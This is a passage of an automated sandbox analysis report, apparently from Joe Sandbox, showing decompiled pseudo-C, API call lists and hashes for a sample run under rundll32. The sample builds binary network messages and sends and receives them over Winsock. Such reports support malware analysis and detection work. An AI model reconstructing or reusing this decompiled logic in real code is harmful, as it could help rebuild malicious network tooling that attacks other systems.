                                                                                                                                                                                        				_t303 = HeapAlloc(GetProcessHeap(), 8, 0x100);
                                                                                                                                                                                        				_v12 = _t303;
                                                                                                                                                                                        				if(_t303 == 0) {
                                                                                                                                                                                        					L36:
                                                                                                                                                                                        					return _v5;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t277 = _a16;
                                                                                                                                                                                        				 *((char*)(_t303 + 2)) = 1;
                                                                                                                                                                                        				asm("cdq");
                                                                                                                                                                                        				asm("adc edx, [ebx+0x14]");
                                                                                                                                                                                        				if(E007B40E3( *_t277, _t247, _a4,  *_a8, ( *( *_t277 + 0x5d) & 0x000000ff) +  *((intOrPtr*)( *_t277 + 0x10)), _t268, _t303, 2) == 0) {
                                                                                                                                                                                        					L35:
                                                                                                                                                                                        					HeapFree(GetProcessHeap(), 8, _t303);
                                                                                                                                                                                        					goto L36;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_v16 = _v16 & 0x00000000;
                                                                                                                                                                                        				if(E007B3D0D(_t247, _t268, _a4, _a8, _a12,  *((intOrPtr*)( *_t277 + 0x10)),  *((intOrPtr*)( *_t277 + 0x14)),  &_v16, 0x100, _t277) == 0) {
                                                                                                                                                                                        					goto L35;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t178 =  *( *_t277 + 0x5c) & 0x000000ff;
                                                                                                                                                                                        				_t248 = _v16;
                                                                                                                                                                                        				_t231 =  *(_t248 + _t178);
                                                                                                                                                                                        				_v24 =  *((intOrPtr*)(_t178 + _t248 + 4));
                                                                                                                                                                                        				HeapFree(GetProcessHeap(), 8, _t248);
                                                                                                                                                                                        				_t182 =  *_t277;
                                                                                                                                                                                        				if( *((char*)(_t182 + 0x66)) == 0) {
                                                                                                                                                                                        					_t249 =  *(_t182 + 0x64) & 0x000000ff;
                                                                                                                                                                                        					_a12 = _t249;
                                                                                                                                                                                        					if(0 >= _t249) {
                                                                                                                                                                                        						L40:
                                                                                                                                                                                        						if(E007B40E3(_t182, _a8, _a4,  *_a8, _t231, _v24, _t303, _a12) != 0) {
                                                                                                                                                                                        							_v5 = 1;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						goto L35;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t278 = 0;
                                                                                                                                                                                        					_t251 = _t249 & 0x0000ffff;
                                                                                                                                                                                        					do {
                                                                                                                                                                                        						 *(_t278 + _t303 + 1) =  !( *(_t278 +  *((intOrPtr*)(_t182 + 0x60))));
                                                                                                                                                                                        						_t278 = _t278 + 1;
                                                                                                                                                                                        						_t251 = _t251 - 1;
                                                                                                                                                                                        					} while (_t251 != 0);
                                                                                                                                                                                        					goto L40;
                                                                                                                                                                                        				} else {
                                                                                                                                                                                        					_t184 =  *((intOrPtr*)(_t182 + 0x65));
                                                                                                                                                                                        					if( *((intOrPtr*)(_t182 + 0x65)) != 0) {
                                                                                                                                                                                        						asm("cdq");
                                                                                                                                                                                        						asm("adc edx, [ebp-0x14]");
                                                                                                                                                                                        						_t248 =  &_v16;
                                                                                                                                                                                        						if(E007B3D0D( &_v16, _t268, _a4, _a8, _a12, (_t184 & 0x000000ff) + _t231, _t268,  &_v16, 8, _t277) == 0) {
                                                                                                                                                                                        							_t231 = 0;
                                                                                                                                                                                        							_v24 = 0;
                                                                                                                                                                                        						} else {
                                                                                                                                                                                        							_t227 = _v16;
                                                                                                                                                                                        							_t248 =  *(_t227 + 4);
                                                                                                                                                                                        							_t231 =  *_t227;
                                                                                                                                                                                        							_v24 =  *(_t227 + 4);
                                                                                                                                                                                        							HeapFree(GetProcessHeap(), 8, _t227);
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        					if(_t231 != 0 || _v24 != _t231) {
                                                                                                                                                                                        						asm("cdq");
                                                                                                                                                                                        						asm("adc edx, [ebp-0x14]");
                                                                                                                                                                                        						if(E007B3D0D(_t248, _t268, _a4, _a8, _a12, ( *( *_t277 + 0x66) & 0x000000ff) + _t231, _t268,  &_v16, 8, _t277) == 0) {
                                                                                                                                                                                        							goto L35;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_t190 = _v16;
                                                                                                                                                                                        						_t233 =  *_t190;
                                                                                                                                                                                        						_v36 =  *_t190;
                                                                                                                                                                                        						_v32 =  *((intOrPtr*)(_t190 + 4));
                                                                                                                                                                                        						HeapFree(GetProcessHeap(), 8, _t190);
                                                                                                                                                                                        						_t253 =  *_t277;
                                                                                                                                                                                        						_t193 = 0x100;
                                                                                                                                                                                        						if(0 ==  *((intOrPtr*)( *_t277))) {
                                                                                                                                                                                        							_t193 = 0x200;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						if(E007B3D0D(_t253, 0, _a4, _a8, _a12, _t233, _v32,  &_v16, _t193, _t277) == 0) {
                                                                                                                                                                                        							goto L35;
                                                                                                                                                                                        						} else {
                                                                                                                                                                                        							_t254 =  *_t277;
                                                                                                                                                                                        							_t196 = _v16;
                                                                                                                                                                                        							_t255 =  *(_t254 + 0x68) & 0x000000ff;
                                                                                                                                                                                        							_t234 =  *((intOrPtr*)(_t196 + _t255));
                                                                                                                                                                                        							_a12 =  *(_t196 + ( *(_t254 + 0x67) & 0x000000ff));
                                                                                                                                                                                        							_v28 = _t234;
                                                                                                                                                                                        							_v24 =  *((intOrPtr*)(_t255 + _t196 + 4));
                                                                                                                                                                                        							HeapFree(GetProcessHeap(), 8, _t196);
                                                                                                                                                                                        							memset(_t303, 0, 0x100);
                                                                                                                                                                                        							if(_a12 == 0) {
                                                                                                                                                                                        								goto L35;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							_t279 =  *_t277;
                                                                                                                                                                                        							_t257 = _a12;
                                                                                                                                                                                        							_v16 = _t279;
                                                                                                                                                                                        							if(1 !=  *_t279) {
                                                                                                                                                                                        								_t258 = _t257 - 1;
                                                                                                                                                                                        								if(_t258 == 0) {
                                                                                                                                                                                        									_a12 = 1;
                                                                                                                                                                                        									_t235 = _t234 + 0x10;
                                                                                                                                                                                        									asm("adc eax, edx");
                                                                                                                                                                                        									 *(_t303 + 5) = _v24;
                                                                                                                                                                                        									_push(0x1c);
                                                                                                                                                                                        									L30:
                                                                                                                                                                                        									 *((intOrPtr*)(_t303 + 1)) = _t235;
                                                                                                                                                                                        									L31:
                                                                                                                                                                                        									asm("movsd");
                                                                                                                                                                                        									asm("movsd");
                                                                                                                                                                                        									asm("movsd");
                                                                                                                                                                                        									_pop(_t305);
                                                                                                                                                                                        									_t281 = _a8;
                                                                                                                                                                                        									_t260 = _a12;
                                                                                                                                                                                        									 *((_t305 & 0x0000ffff) + _v12 + 1 + 4) = _a12;
                                                                                                                                                                                        									asm("cdq");
                                                                                                                                                                                        									asm("adc edx, [ebp-0x1c]");
                                                                                                                                                                                        									if(E007B40E3(_v16, _a12, _a4,  *_a8, ( *(_v16 + 0x67) & 0x000000ff) + _v36, 0, (_t305 & 0x0000ffff) + _v12 + 1 + 3, 4) != 0 && E007B40E3( *_a16, _t260, _a4,  *_t281, _v28, _v24, _v12, _t305) != 0) {
                                                                                                                                                                                        										_v5 = 1;
                                                                                                                                                                                        									}
                                                                                                                                                                                        									_t303 = _v12;
                                                                                                                                                                                        									goto L35;
                                                                                                                                                                                        								}
                                                                                                                                                                                        								_t261 = _t258 - 1;
                                                                                                                                                                                        								_t211 = _t234;
                                                                                                                                                                                        								if(_t261 == 0) {
                                                                                                                                                                                        									_t262 = _v24;
                                                                                                                                                                                        									_t212 = _t211 + 0x20;
                                                                                                                                                                                        									 *((intOrPtr*)(_t303 + 1)) = _t212;
                                                                                                                                                                                        									asm("adc ecx, edx");
                                                                                                                                                                                        									 *(_t303 + 5) = _t262;
                                                                                                                                                                                        									 *((intOrPtr*)(_t303 + 0x11)) = _t212 + 0xc;
                                                                                                                                                                                        									 *((char*)(_t303 + 0x19)) = 0xe;
                                                                                                                                                                                        									asm("adc ecx, edx");
                                                                                                                                                                                        									 *(_t303 + 0x15) = _t262;
                                                                                                                                                                                        									asm("movsd");
                                                                                                                                                                                        									asm("movsd");
                                                                                                                                                                                        									asm("movsd");
                                                                                                                                                                                        									_a12 = 2;
                                                                                                                                                                                        									asm("movsd");
                                                                                                                                                                                        									_push(0x3c);
                                                                                                                                                                                        								} else {
                                                                                                                                                                                        									_t264 = _v24;
                                                                                                                                                                                        									if(_t261 == 1) {
                                                                                                                                                                                        										_t214 = _t211 + 0x30;
                                                                                                                                                                                        										 *((intOrPtr*)(_t303 + 1)) = _t214;
                                                                                                                                                                                        										asm("adc ecx, edx");
                                                                                                                                                                                        										 *(_t303 + 5) = _t264;
                                                                                                                                                                                        										 *((char*)(_t303 + 0x19)) = 0xe;
                                                                                                                                                                                        										_t215 = _t214 + 0xc;
                                                                                                                                                                                        										 *((intOrPtr*)(_t303 + 0x11)) = _t215;
                                                                                                                                                                                        										asm("adc ecx, edx");
                                                                                                                                                                                        										 *(_t303 + 0x15) = _t264;
                                                                                                                                                                                        										 *((char*)(_t303 + 0x29)) = 7;
                                                                                                                                                                                        										 *((intOrPtr*)(_t303 + 0x21)) = _t215 + 0x10;
                                                                                                                                                                                        										asm("adc ecx, edx");
                                                                                                                                                                                        										 *(_t303 + 0x25) = _t264;
                                                                                                                                                                                        										asm("movsd");
                                                                                                                                                                                        										asm("movsd");
                                                                                                                                                                                        										asm("movsd");
                                                                                                                                                                                        										asm("movsd");
                                                                                                                                                                                        										asm("movsd");
                                                                                                                                                                                        										asm("movsd");
                                                                                                                                                                                        										asm("movsd");
                                                                                                                                                                                        										_a12 = 3;
                                                                                                                                                                                        										_push(0x58);
                                                                                                                                                                                        									} else {
                                                                                                                                                                                        										_t218 = _t211 + 0x40;
                                                                                                                                                                                        										 *((intOrPtr*)(_t303 + 1)) = _t218;
                                                                                                                                                                                        										asm("adc ecx, edx");
                                                                                                                                                                                        										 *(_t303 + 5) = _t264;
                                                                                                                                                                                        										 *((char*)(_t303 + 0x19)) = 0xe;
                                                                                                                                                                                        										_t219 = _t218 + 0xc;
                                                                                                                                                                                        										 *((intOrPtr*)(_t303 + 0x11)) = _t219;
                                                                                                                                                                                        										asm("adc ecx, edx");
                                                                                                                                                                                        										 *(_t303 + 0x15) = _t264;
                                                                                                                                                                                        										 *((char*)(_t303 + 0x29)) = 7;
                                                                                                                                                                                        										_t220 = _t219 + 0x10;
                                                                                                                                                                                        										 *((intOrPtr*)(_t303 + 0x21)) = _t220;
                                                                                                                                                                                        										asm("adc ecx, edx");
                                                                                                                                                                                        										 *(_t303 + 0x25) = _t264;
                                                                                                                                                                                        										 *((char*)(_t303 + 0x39)) = 7;
                                                                                                                                                                                        										 *((intOrPtr*)(_t303 + 0x31)) = _t220 + 0xc;
                                                                                                                                                                                        										asm("adc ecx, edx");
                                                                                                                                                                                        										 *(_t303 + 0x35) = _t264;
                                                                                                                                                                                        										asm("movsd");
                                                                                                                                                                                        										asm("movsd");
                                                                                                                                                                                        										asm("movsd");
                                                                                                                                                                                        										asm("movsd");
                                                                                                                                                                                        										asm("movsd");
                                                                                                                                                                                        										asm("movsd");
                                                                                                                                                                                        										asm("movsd");
                                                                                                                                                                                        										asm("movsd");
                                                                                                                                                                                        										asm("movsd");
                                                                                                                                                                                        										asm("movsd");
                                                                                                                                                                                        										_a12 = 4;
                                                                                                                                                                                        										_push(0x74);
                                                                                                                                                                                        									}
                                                                                                                                                                                        								}
                                                                                                                                                                                        								goto L31;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							_t265 = _t257 - 1;
                                                                                                                                                                                        							if(_t265 == 0) {
                                                                                                                                                                                        								_a12 = 1;
                                                                                                                                                                                        								_t235 = _t234 + 8;
                                                                                                                                                                                        								_push(0x14);
                                                                                                                                                                                        								goto L30;
                                                                                                                                                                                        							}
                                                                                                                                                                                        							_t266 = _t265 - 1;
                                                                                                                                                                                        							if(_t266 == 0) {
                                                                                                                                                                                        								_t238 = _t234 + 0x10;
                                                                                                                                                                                        								 *((intOrPtr*)(_t303 + 1)) = _t238;
                                                                                                                                                                                        								 *((char*)(_t303 + 0xd)) = 0xe;
                                                                                                                                                                                        								 *((intOrPtr*)(_t303 + 9)) = _t238 + 0xc;
                                                                                                                                                                                        								asm("movsd");
                                                                                                                                                                                        								asm("movsd");
                                                                                                                                                                                        								asm("movsd");
                                                                                                                                                                                        								_a12 = 2;
                                                                                                                                                                                        								asm("movsd");
                                                                                                                                                                                        								_push(0x2c);
                                                                                                                                                                                        							} else {
                                                                                                                                                                                        								if(_t266 == 1) {
                                                                                                                                                                                        									_t240 = _t234 + 0x18;
                                                                                                                                                                                        									 *((intOrPtr*)(_t303 + 1)) = _t240;
                                                                                                                                                                                        									 *((char*)(_t303 + 0xd)) = 0xe;
                                                                                                                                                                                        									_t241 = _t240 + 0xc;
                                                                                                                                                                                        									 *((intOrPtr*)(_t303 + 9)) = _t241;
                                                                                                                                                                                        									 *(_t303 + 0x15) = 7;
                                                                                                                                                                                        									 *((intOrPtr*)(_t303 + 0x11)) = _t241 + 0x10;
                                                                                                                                                                                        									asm("movsd");
                                                                                                                                                                                        									asm("movsd");
                                                                                                                                                                                        									asm("movsd");
                                                                                                                                                                                        									asm("movsd");
                                                                                                                                                                                        									asm("movsd");
                                                                                                                                                                                        									asm("movsd");
                                                                                                                                                                                        									asm("movsd");
                                                                                                                                                                                        									_a12 = 3;
                                                                                                                                                                                        									_push(0x40);
                                                                                                                                                                                        								} else {
                                                                                                                                                                                        									_t243 = _t234 + 0x20;
                                                                                                                                                                                        									 *((intOrPtr*)(_t303 + 1)) = _t243;
                                                                                                                                                                                        									 *((char*)(_t303 + 0xd)) = 0xe;
                                                                                                                                                                                        									_t244 = _t243 + 0xc;
                                                                                                                                                                                        									 *((intOrPtr*)(_t303 + 9)) = _t244;
                                                                                                                                                                                        									 *(_t303 + 0x15) = 7;
                                                                                                                                                                                        									_t245 = _t244 + 0x10;
                                                                                                                                                                                        									 *((intOrPtr*)(_t303 + 0x11)) = _t245;
                                                                                                                                                                                        									 *((char*)(_t303 + 0x1d)) = 7;
                                                                                                                                                                                        									 *((intOrPtr*)(_t303 + 0x19)) = _t245 + 0xc;
                                                                                                                                                                                        									asm("movsd");
                                                                                                                                                                                        									asm("movsd");
                                                                                                                                                                                        									asm("movsd");
                                                                                                                                                                                        									asm("movsd");
                                                                                                                                                                                        									asm("movsd");
                                                                                                                                                                                        									asm("movsd");
                                                                                                                                                                                        									asm("movsd");
                                                                                                                                                                                        									asm("movsd");
                                                                                                                                                                                        									asm("movsd");
                                                                                                                                                                                        									asm("movsd");
                                                                                                                                                                                        									_a12 = 4;
                                                                                                                                                                                        									_push(0x54);
                                                                                                                                                                                        								}
                                                                                                                                                                                        							}
                                                                                                                                                                                        							goto L31;
                                                                                                                                                                                        						}
                                                                                                                                                                                        					} else {
                                                                                                                                                                                        						goto L35;
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        			}



















































                                                                                                                                                                                        0x007b4632
                                                                                                                                                                                        0x007b4643
                                                                                                                                                                                        0x007b4662
                                                                                                                                                                                        0x007b4662
                                                                                                                                                                                        0x007b4666
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x007b4666
                                                                                                                                                                                        0x007b44d8
                                                                                                                                                                                        0x007b44d9
                                                                                                                                                                                        0x007b44db
                                                                                                                                                                                        0x007b45b0
                                                                                                                                                                                        0x007b45b3
                                                                                                                                                                                        0x007b45b6
                                                                                                                                                                                        0x007b45b9
                                                                                                                                                                                        0x007b45bb
                                                                                                                                                                                        0x007b45c1
                                                                                                                                                                                        0x007b45c4
                                                                                                                                                                                        0x007b45cb
                                                                                                                                                                                        0x007b45cd
                                                                                                                                                                                        0x007b45d5
                                                                                                                                                                                        0x007b45d6
                                                                                                                                                                                        0x007b45d7
                                                                                                                                                                                        0x007b45e3
                                                                                                                                                                                        0x007b45ea
                                                                                                                                                                                        0x007b45eb
                                                                                                                                                                                        0x007b44e1
                                                                                                                                                                                        0x007b44e2
                                                                                                                                                                                        0x007b44e5
                                                                                                                                                                                        0x007b455a
                                                                                                                                                                                        0x007b455d
                                                                                                                                                                                        0x007b4560
                                                                                                                                                                                        0x007b4562
                                                                                                                                                                                        0x007b4565
                                                                                                                                                                                        0x007b4569
                                                                                                                                                                                        0x007b456c
                                                                                                                                                                                        0x007b4572
                                                                                                                                                                                        0x007b4574
                                                                                                                                                                                        0x007b4577
                                                                                                                                                                                        0x007b457e
                                                                                                                                                                                        0x007b4584
                                                                                                                                                                                        0x007b4586
                                                                                                                                                                                        0x007b458e
                                                                                                                                                                                        0x007b458f
                                                                                                                                                                                        0x007b4590
                                                                                                                                                                                        0x007b4599
                                                                                                                                                                                        0x007b459a
                                                                                                                                                                                        0x007b459b
                                                                                                                                                                                        0x007b459c
                                                                                                                                                                                        0x007b459d
                                                                                                                                                                                        0x007b45ac
                                                                                                                                                                                        0x007b44e7
                                                                                                                                                                                        0x007b44e7
                                                                                                                                                                                        0x007b44ea
                                                                                                                                                                                        0x007b44ed
                                                                                                                                                                                        0x007b44ef
                                                                                                                                                                                        0x007b44f2
                                                                                                                                                                                        0x007b44f6
                                                                                                                                                                                        0x007b44f9
                                                                                                                                                                                        0x007b44ff
                                                                                                                                                                                        0x007b4501
                                                                                                                                                                                        0x007b4504
                                                                                                                                                                                        0x007b4508
                                                                                                                                                                                        0x007b450b
                                                                                                                                                                                        0x007b450e
                                                                                                                                                                                        0x007b4510
                                                                                                                                                                                        0x007b4513
                                                                                                                                                                                        0x007b451a
                                                                                                                                                                                        0x007b4520
                                                                                                                                                                                        0x007b4522
                                                                                                                                                                                        0x007b452a
                                                                                                                                                                                        0x007b452b
                                                                                                                                                                                        0x007b452c
                                                                                                                                                                                        0x007b4535
                                                                                                                                                                                        0x007b4536
                                                                                                                                                                                        0x007b4537
                                                                                                                                                                                        0x007b4538
                                                                                                                                                                                        0x007b4541
                                                                                                                                                                                        0x007b4542
                                                                                                                                                                                        0x007b4543
                                                                                                                                                                                        0x007b4544
                                                                                                                                                                                        0x007b4553
                                                                                                                                                                                        0x007b4553
                                                                                                                                                                                        0x007b44e5
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x007b44db
                                                                                                                                                                                        0x007b43d5
                                                                                                                                                                                        0x007b43d6
                                                                                                                                                                                        0x007b44c1
                                                                                                                                                                                        0x007b44c4
                                                                                                                                                                                        0x007b44ca
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x007b44ca
                                                                                                                                                                                        0x007b43dc
                                                                                                                                                                                        0x007b43dd
                                                                                                                                                                                        0x007b448c
                                                                                                                                                                                        0x007b448f
                                                                                                                                                                                        0x007b4492
                                                                                                                                                                                        0x007b449c
                                                                                                                                                                                        0x007b44a4
                                                                                                                                                                                        0x007b44a5
                                                                                                                                                                                        0x007b44a6
                                                                                                                                                                                        0x007b44b2
                                                                                                                                                                                        0x007b44b9
                                                                                                                                                                                        0x007b44ba
                                                                                                                                                                                        0x007b43e3
                                                                                                                                                                                        0x007b43e7
                                                                                                                                                                                        0x007b4445
                                                                                                                                                                                        0x007b4448
                                                                                                                                                                                        0x007b444b
                                                                                                                                                                                        0x007b4452
                                                                                                                                                                                        0x007b4455
                                                                                                                                                                                        0x007b4458
                                                                                                                                                                                        0x007b445f
                                                                                                                                                                                        0x007b4467
                                                                                                                                                                                        0x007b4468
                                                                                                                                                                                        0x007b4469
                                                                                                                                                                                        0x007b4472
                                                                                                                                                                                        0x007b4473
                                                                                                                                                                                        0x007b4474
                                                                                                                                                                                        0x007b4475
                                                                                                                                                                                        0x007b4476
                                                                                                                                                                                        0x007b4485
                                                                                                                                                                                        0x007b43e9
                                                                                                                                                                                        0x007b43e9
                                                                                                                                                                                        0x007b43ec
                                                                                                                                                                                        0x007b43ef
                                                                                                                                                                                        0x007b43f6
                                                                                                                                                                                        0x007b43f9
                                                                                                                                                                                        0x007b43fc
                                                                                                                                                                                        0x007b4400
                                                                                                                                                                                        0x007b4403
                                                                                                                                                                                        0x007b4406
                                                                                                                                                                                        0x007b440d
                                                                                                                                                                                        0x007b4415
                                                                                                                                                                                        0x007b4416
                                                                                                                                                                                        0x007b4417
                                                                                                                                                                                        0x007b4420
                                                                                                                                                                                        0x007b4421
                                                                                                                                                                                        0x007b4422
                                                                                                                                                                                        0x007b4423
                                                                                                                                                                                        0x007b442c
                                                                                                                                                                                        0x007b442d
                                                                                                                                                                                        0x007b442e
                                                                                                                                                                                        0x007b442f
                                                                                                                                                                                        0x007b443e
                                                                                                                                                                                        0x007b443e
                                                                                                                                                                                        0x007b43e7
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x007b43dd
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x00000000
                                                                                                                                                                                        0x007b42ef

APIs
• GetProcessHeap.KERNEL32(00000008,00000100,00000000,?,74654F20), ref: 007B41FD
• HeapAlloc.KERNEL32(00000000), ref: 007B4204
  • Part of subcall function 007B40E3: GetProcessHeap.KERNEL32(00000008,00000027,?,00000000,?,?,?,007B423D,?,?,?,?,00000000,00000002), ref: 007B40F8
  • Part of subcall function 007B40E3: HeapAlloc.KERNEL32(00000000,?,?,?,007B423D,?,?,?,?,00000000,00000002), ref: 007B40FB
  • Part of subcall function 007B40E3: GetProcessHeap.KERNEL32(00000008,00000009,?,?,?,007B423D,?,?,?,?,00000000,00000002), ref: 007B4148
  • Part of subcall function 007B40E3: HeapAlloc.KERNEL32(00000000,?,?,?,007B423D,?,?,?,?,00000000,00000002), ref: 007B414B
  • Part of subcall function 007B40E3: Sleep.KERNEL32(000007D0,00000000,?,?,00000000,00000000,?,?,?,?,007B423D,?,?,?,?,00000000), ref: 007B4184
                                                                                                                                                                                          • Part of subcall function 007B40E3: Sleep.KERNEL32(000007D0,00000000,?,?,00000000,?,=B{,?,?,?,007B423D,?,?,?,?,00000000), ref: 007B41BC
                                                                                                                                                                                          • Part of subcall function 007B40E3: GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,?,00000000,00000000,?,?,?,?,007B423D,?,?,?,?), ref: 007B41CB
                                                                                                                                                                                          • Part of subcall function 007B40E3: HeapFree.KERNEL32(00000000,?,?,?,007B423D,?,?,?,?,00000000,00000002), ref: 007B41CE
                                                                                                                                                                                          • Part of subcall function 007B40E3: GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,007B423D,?,?,?,?,00000000,00000002), ref: 007B41D7
                                                                                                                                                                                          • Part of subcall function 007B40E3: HeapFree.KERNEL32(00000000,?,?,?,007B423D,?,?,?,?,00000000,00000002), ref: 007B41DA
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000,?,00000000,?,?,?,00000000,00000100,?,?,?,?,?,00000000,00000002), ref: 007B4287
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 007B428E
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000,?,00000000,?,?,?,00000000,00000008,?), ref: 007B42D9
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 007B42E0
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000,?,00000000,?,?,?,00000000,00000008,?), ref: 007B4336
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 007B433D
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000,?,00000000,?,74654F20,?,00000000,00000100,?), ref: 007B4399
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 007B43A0
                                                                                                                                                                                        • memset.MSVCRT ref: 007B43AE
                                                                                                                                                                                          • Part of subcall function 007B3D0D: rand.MSVCRT ref: 007B3EC3
                                                                                                                                                                                          • Part of subcall function 007B3D0D: memset.MSVCRT ref: 007B3EFC
                                                                                                                                                                                          • Part of subcall function 007B3D0D: recv.WS2_32(00000000,00000000,0000FFFF,00000000), ref: 007B3F38
                                                                                                                                                                                          • Part of subcall function 007B3D0D: htons.WS2_32(?), ref: 007B3F5C
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,00000000,00000002), ref: 007B466C
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 007B4673
                                                                                                                                                                                          • Part of subcall function 007B3D0D: GetProcessHeap.KERNEL32(00000008,0000FFFF,?,74654F20,?,?,?,007B4269,?,00000000,?,?,?,00000000,00000100,?), ref: 007B3D2B
                                                                                                                                                                                          • Part of subcall function 007B3D0D: HeapAlloc.KERNEL32(00000000,?,?,?,007B4269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 007B3D34
                                                                                                                                                                                          • Part of subcall function 007B3D0D: GetProcessHeap.KERNEL32(00000008,00000027,00000000,?,?,?,007B4269,?,00000000,?,?,?,00000000,00000100,?,?), ref: 007B3D46
                                                                                                                                                                                          • Part of subcall function 007B3D0D: HeapAlloc.KERNEL32(00000000,?,?,?,007B4269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 007B3D49
                                                                                                                                                                                          • Part of subcall function 007B3D0D: GetProcessHeap.KERNEL32(00000008,0000003D,?,?,?,007B4269,?,00000000,?,?,?,00000000,00000100,?,?,?), ref: 007B3D63
                                                                                                                                                                                          • Part of subcall function 007B3D0D: HeapAlloc.KERNEL32(00000000,?,?,?,007B4269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 007B3D66
                                                                                                                                                                                          • Part of subcall function 007B3D0D: Sleep.KERNEL32(000007D0,00000000,?,?,00000000,00000000,?,?,?,?,007B4269,?,00000000,?,?,?), ref: 007B3E5B
                                                                                                                                                                                          • Part of subcall function 007B3D0D: GetProcessHeap.KERNEL32(00000008,00000029,?,?,?,007B4269,?,00000000,?,?,?,00000000,00000100,?,?,?), ref: 007B3E65
                                                                                                                                                                                          • Part of subcall function 007B3D0D: HeapAlloc.KERNEL32(00000000,?,?,?,007B4269,?,00000000,?,?,?,00000000,00000100,?,?,?,?), ref: 007B3E68
                                                                                                                                                                                        Strings
Memory Dump Source
• Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Heap$Process$AllocFree$Sleep$memset$htonsrandrecv
                                                                                                                                                                                        • String ID: Oet Uet0Xet$6|$6|$6|$6|
                                                                                                                                                                                        • API String ID: 2891003447-4284513384
                                                                                                                                                                                        • Opcode ID: 5c6af463f525d632a111f1b0bf486a69f78f3696f37f54fadf1a5e648834a27c
                                                                                                                                                                                        • Instruction ID: b7fcc98ec0954cab2b23bc0d6b301f08e80cff4fbd6f3e6c014eab7c160b612b
                                                                                                                                                                                        • Opcode Fuzzy Hash: 5c6af463f525d632a111f1b0bf486a69f78f3696f37f54fadf1a5e648834a27c
                                                                                                                                                                                        • Instruction Fuzzy Hash: A8F19C71904745AFDB11CF44C844FAABBB2BF4A304F09856DF949AB352C3B9EA15CB90
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 50%
                                                                                                                                                                                        			E007B3071(void* __ecx, intOrPtr _a4, void* _a8, short _a12, void** _a16, int* _a20) {
                                                                                                                                                                                        				char _v5;
                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                        				void* _t25;
                                                                                                                                                                                        				void* _t31;
                                                                                                                                                                                        				void* _t37;
                                                                                                                                                                                        				void* _t40;
                                                                                                                                                                                        				signed int _t43;
                                                                                                                                                                                        				int _t48;
                                                                                                                                                                                        				int* _t60;
                                                                                                                                                                                        
                                                                                                                                                                                        				_v5 = 0;
                                                                                                                                                                                        				_t25 = HeapAlloc(GetProcessHeap(), 8, 0xffff);
                                                                                                                                                                                        				_v12 = _t25;
                                                                                                                                                                                        				if(_t25 == 0) {
                                                                                                                                                                                        					L9:
                                                                                                                                                                                        					return _v5;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t40 = HeapAlloc(GetProcessHeap(), 8, 0x3f);
                                                                                                                                                                                        				if(_t40 == 0) {
                                                                                                                                                                                        					L8:
                                                                                                                                                                                        					HeapFree(GetProcessHeap(), 8, _v12);
                                                                                                                                                                                        					goto L9;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t43 = 9;
                                                                                                                                                                                        				_t31 = memcpy(_t40, _a8, _t43 << 2);
                                                                                                                                                                                        				__imp__#9(0x3b);
                                                                                                                                                                                        				 *(_t40 + 2) = _t31;
                                                                                                                                                                                        				 *((short*)(_t40 + 0x29)) = _a12;
                                                                                                                                                                                        				 *((char*)(_t40 + 8)) = 0x2e;
                                                                                                                                                                                        				 *((short*)(_t40 + 0x24)) = 0xff0c;
                                                                                                                                                                                        				 *((short*)(_t40 + 0x2f)) = 0xfde8;
                                                                                                                                                                                        				 *((short*)(_t40 + 0x31)) = 0xfde8;
                                                                                                                                                                                        				 *((short*)(_t40 + 0x37)) = 0xfde8;
                                                                                                                                                                                        				__imp__#19(_a4, _t40, 0x3f, 0);
                                                                                                                                                                                        				if(0xfde8 > 0) {
                                                                                                                                                                                        					__imp__#16(_a4, _v12, 0xffff, 0);
                                                                                                                                                                                        					_t60 = _a20;
                                                                                                                                                                                        					 *_t60 = 0xfde8;
